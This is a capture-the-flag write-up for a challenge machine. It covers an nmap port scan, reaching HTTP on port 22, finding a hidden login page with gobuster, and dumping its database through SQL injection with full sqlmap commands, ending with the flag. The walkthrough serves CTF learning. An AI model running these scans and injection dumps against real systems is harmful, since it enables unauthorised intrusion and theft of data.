Flag 7

Category

Subset of subset of hacking machines challenges

Challenge

Flag 7

We are given a URL - hackit.zh3r0.ml

Solution

Optional: Find IP address of the given domain using ping

Since it is a machine, begin with a full port scan

nmap -T4 -sC -sV -p- hackit.zh3r0.ml

Note: Not sure if I used the right [options], run nmap --help for better understanding and optimisation

This reveals all the open ports and services running on each port. Also notice that the services running are all mixed up.

22/tcp    open     http
25/tcp    filtered smtp
99/tcp    open     ssh
324/tcp   open     ftp
4994/tcp  open     unknown
11211/tcp filtered memcache

• Since http is running on port 22, it will be restricted by the browser and we will not be able to access it directly. There are two ways around this problem.
  1. Allow restricted ports in Firefox Browser
     • Go to about:config in Firefox address bar
     • Add a string with name and value as

        name  : network.security.ports.banned.override
        value : 22
       

     • Access http://hackit.zh3r0.ml:22/robots.txt
  2. Access the webpage through cURL or wget
     curl http://hackit.zh3r0.ml:22/robots.txt
wget http://hackit.zh3r0.ml:22/robots.txt
• There is a clue which has something to do with ads. There are two ways to go about this.
  1. Make a guess to visit http://hackit.zh3r0.ml:22/ads.txt
     • Obtain a string encoded in Base 62 (Damn, these aren’t the bases I am aware of :tired_face:)
     • Use https://gchq.github.io/CyberChef/ to decode and get another webpage /index2.html
     • This page contains a login
  2. Use directory busting tools on http://hackit.zh3r0.ml:22/
     • gobuster dir -u http://hackit.zh3r0.ml:22/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
     • dirbuster - GUI tool
     • This also reveals /index2.html without getting to ads.txt
• The login in page /index2.html seems to be vulnerable to SQL Injection, we can exploit it using sqlmap
  • To retrieve databases, use the command
    sqlmap -u http://139.59.3.42:22/ --data="username=f4k3&password=fl4g" --method POST --dbs --batch
  • There are 4 databases, of which users seems interesting
  • To retrieve all information about a database, use the command
    sqlmap -u http://139.59.3.42:22 --data="username=f4k3&password=fl4g" --method POST -D users --dump all --batch
  • This gets us Flag 7
    zh3r0{Dangit_you_are_good!}

    Note: sqlmap takes quite sometime, so grab a snack while you watch the flag unfold :cookie: